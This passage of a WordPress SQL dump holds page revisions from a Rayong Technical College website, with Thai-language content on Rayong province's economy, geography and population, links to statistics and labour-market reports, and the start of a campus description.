href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong>\r\n\r\n<strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong>\r\n\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a>\r\n<div class=\"article-rel-wrapper\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></div>\r\n<div class=\"article-rel-wrapper\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a>\r\n<div class=\"article-rel-wrapper\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-10-02 10:46:57', '2018-10-02 03:46:57', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(4038, 3, '2018-10-02 10:49:22', '2018-10-02 03:49:22', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=category&layout=blog&id=62&Itemid=135\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 339</span>,333<span lang=\"TH\"> คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 349,666 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 698,017 <span lang=\"TH\">คนในปี</span> 2561 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/images/stories/rayongdata60.pdf\">บรรยายสรุปจังหวัดระยอง 2560</a></h4>\r\n<h4><b><a href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></h4>\r\n<h4><a href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></h4>\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a>\r\n\r\n \r\n\r\n<b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b>\r\n\r\n<span style=\"color: #0000ff; font-size: medium;\"><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span>\r\n\r\n<b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b>\r\n\r\n<strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong>\r\n\r\n<strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong>\r\n\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a>\r\n<div class=\"article-rel-wrapper\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></div>\r\n<div class=\"article-rel-wrapper\">\r\n\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a>\r\n<div class=\"article-rel-wrapper\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-10-02 10:49:22', '2018-10-02 03:49:22', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(4039, 3, '2018-10-02 10:57:01', '2018-10-02 03:57:01', '<img class=\"aligncenter wp-image-3244 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-02-29.jpg\" alt=\"\" width=\"793\" height=\"553\" />\n\n<img class=\"aligncenter wp-image-3243 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-14-58-31.jpg\" alt=\"\" width=\"878\" height=\"383\" />\n\n<img class=\"aligncenter wp-image-3246 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-39-56.jpg\" alt=\"\" width=\"1104\" height=\"593\" />\n\n<img class=\"aligncenter wp-image-3248 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-44-00.jpg\" alt=\"\" width=\"885\" height=\"500\" /> <img class=\"aligncenter wp-image-3250\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-46-00.jpg\" alt=\"\" width=\"700\" height=\"676\" />\n<h2><a href=\"/ข้อมูลนักเรียน-นักศึกษ-2\"><span style=\"color: #0000ff;\">>>ข้อมูลนักเรียน นักศึกษา</span></a></h2>\n<h2><a href=\"/รายงานผลสัมฤทธิ์ทางการ\"><span style=\"color: #0000ff;\">>>รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา</span></a></h2>\n<h2 class=\"entry-title\"><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน</span></h2>\n \n\n ', 'ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '3217-autosave-v1', '', '', '2018-10-02 10:57:01', '2018-10-02 03:57:01', '', 3217, 'http://www.technicrayong.ac.th/3217-autosave-v1/', 0, 'revision', '', 0),
(4040, 3, '2018-10-02 10:57:16', '2018-10-02 03:57:16', '<img class=\"aligncenter wp-image-3244 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-02-29.jpg\" alt=\"\" width=\"793\" height=\"553\" />\r\n\r\n<img class=\"aligncenter wp-image-3243 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-14-58-31.jpg\" alt=\"\" width=\"878\" height=\"383\" />\r\n\r\n<img class=\"aligncenter wp-image-3246 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-39-56.jpg\" alt=\"\" width=\"1104\" height=\"593\" />\r\n\r\n<img class=\"aligncenter wp-image-3248 size-full\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-44-00.jpg\" alt=\"\" width=\"885\" height=\"500\" /> <img class=\"aligncenter wp-image-3250\" src=\"/wp-content/uploads/2018/06/27-6-2561-15-46-00.jpg\" alt=\"\" width=\"700\" height=\"676\" />\r\n<h2><a href=\"/ข้อมูลนักเรียน-นักศึกษ-2\"><span style=\"color: #0000ff;\">>>ข้อมูลนักเรียน นักศึกษา</span></a></h2>\r\n<h2><a href=\"/รายงานผลสัมฤทธิ์ทางการ\"><span style=\"color: #0000ff;\">>>รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา</span></a></h2>\r\n<h2 class=\"entry-title\"><a href=\"http://www.technicrayong.ac.th/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%B4%E0%B8%94%E0%B8%95%E0%B8%B2%E0%B8%A1%E0%B8%9C%E0%B8%A5%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%AA%E0%B8%B2/\"><span style=\"color: #0000ff;\">>>รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน</span></a></h2>\r\n \r\n\r\n ', 'ข้อมูลนักเรียน นักศึกษา ภาคเรียนที่ 1 ปีการศึกษา 2561', '', 'inherit', 'closed', 'closed', '', '3217-revision-v1', '', '', '2018-10-02 10:57:16', '2018-10-02 03:57:16', '', 3217, 'http://www.technicrayong.ac.th/3217-revision-v1/', 0, 'revision', '', 0),
(4041, 3, '2018-10-02 11:04:26', '2018-10-02 04:04:26', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\n \n\n<img class=\"size-full wp-image-3024 aligncenter\" src=\"/wp-content/uploads/2018/06/ProvinceRayong2-copy.png\" alt=\"\" width=\"657\" height=\"446\" />\n\n \n<h3><a href=\"/รายงานการติดตามผลผู้สา\"><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน </span></a></h3>\n<h3><a href=\"/สรุปโครงการความร่วมมือ\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับหน่วยงานภายนอก</strong></span></a></h3>\n<h3><a href=\"/สรุปโครงการความร่วมมือ-2\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับต่างประเทศ </strong></span></a></h3>\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี.pdf\">สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี</a></h3>\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\n\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\n\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\n\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a><a href=\"https://eservice.labour.go.th/dlpwMapWeb/map/\"><img class=\"wp-image-3196 size-full alignleft\" src=\"/wp-content/uploads/2018/06/25-6-2561-13-20-05.jpg\" alt=\"\" width=\"965\" height=\"155\" /></a>\n\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-autosave-v1', '', '', '2018-10-02 11:04:26', '2018-10-02 04:04:26', '', 2994, 'http://www.technicrayong.ac.th/2994-autosave-v1/', 0, 'revision', '', 0),
(4042, 3, '2018-10-02 11:04:24', '2018-10-02 04:04:24', '', '2-10-2561 11-06-56', '', 'inherit', 'closed', 'closed', '', '2-10-2561-11-06-56', '', '', '2018-10-02 11:04:24', '2018-10-02 04:04:24', '', 2994, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/2-10-2561-11-06-56.jpg', 0, 'attachment', 'image/jpeg', 0),
(4043, 3, '2018-10-02 11:04:31', '2018-10-02 04:04:31', '', '2-10-2561 11-05-59', '', 'inherit', 'closed', 'closed', '', '2-10-2561-11-05-59', '', '', '2018-10-02 11:04:31', '2018-10-02 04:04:31', '', 2994, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/10/2-10-2561-11-05-59.jpg', 0, 'attachment', 'image/jpeg', 0),
(4044, 3, '2018-10-02 11:05:02', '2018-10-02 04:05:02', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\r\n \r\n\r\n<img class=\"size-full wp-image-3024 aligncenter\" src=\"/wp-content/uploads/2018/06/ProvinceRayong2-copy.png\" alt=\"\" width=\"657\" height=\"446\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-4043\" src=\"/wp-content/uploads/2018/10/2-10-2561-11-05-59.jpg\" alt=\"\" width=\"843\" height=\"376\" /> <a href=\"https://eservice.labour.go.th/dlpwMapWeb/map/\"><img class=\"aligncenter size-full wp-image-4042\" src=\"/wp-content/uploads/2018/10/2-10-2561-11-06-56.jpg\" alt=\"\" width=\"845\" height=\"299\" /></a>\r\n<h3><a href=\"/รายงานการติดตามผลผู้สา\"><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน </span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับหน่วยงานภายนอก</strong></span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ-2\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับต่างประเทศ </strong></span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี.pdf\">สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี</a></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a><a href=\"https://eservice.labour.go.th/dlpwMapWeb/map/\"><img class=\"wp-image-3196 size-full alignleft\" src=\"/wp-content/uploads/2018/06/25-6-2561-13-20-05.jpg\" alt=\"\" width=\"965\" height=\"155\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-10-02 11:05:02', '2018-10-02 04:05:02', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(4045, 3, '2018-10-02 11:27:45', '2018-10-02 04:27:45', '<h2><span style=\"color: #800000;\"><strong>ป้ายวิทยาลัยเทคนิคระยอง</strong></span></h2>\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\n<h4></h4>\n<h2><strong><span style=\"color: #800000;\">ที่ตั้งสถานศึกษา</span></strong></h2>\n<h3><strong><span style=\"color: #3366ff;\">เลขที่ 83/13 ถนนตากสินมหาราช ตำบลท่าประดู่ อำเภอเมือง</span></strong></h3>\n<h3><strong><span style=\"color: #3366ff;\">จังหวัดระยอง รหัสไปรษณีย์ 21000</span></strong></h3>\n<h2><span style=\"color: #800000;\"><strong>เนื้อที่สถานศึกษา</strong></span></h2>\n<h3><span style=\"color: #3366ff;\"><strong>76 ไร่ 2 งาน 17 ตารางวา </strong></span></h3>\n \n\n<img class=\"aligncenter size-full wp-image-3474\" src=\"/wp-content/uploads/2018/07/111111.jpg\" alt=\"\" width=\"1534\" height=\"742\" />\n<h2><strong><span style=\"color: #800000;\">มีอาคาร</span> <span style=\"color: #3366ff;\">27</span> <span style=\"color: #800000;\">หลัง</span> <span style=\"color: #800000;\">มีห้อง</span> <span style=\"color: #3366ff;\">406</span> <span style=\"color: #800000;\">ห้อง</span> <span style=\"color: #800000;\">ได้แก่</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">1. อาคารโรงยิม</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">2. อาคารคหกรรม</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">3. อาคารการท่องเที่ยว</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">4. อาคารสารสนเทศ</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">5. อาคารช่างเชื่อมเก่า</span></strong></h2>\n<h2><strong><span style=\"color: #3366ff;\">6. 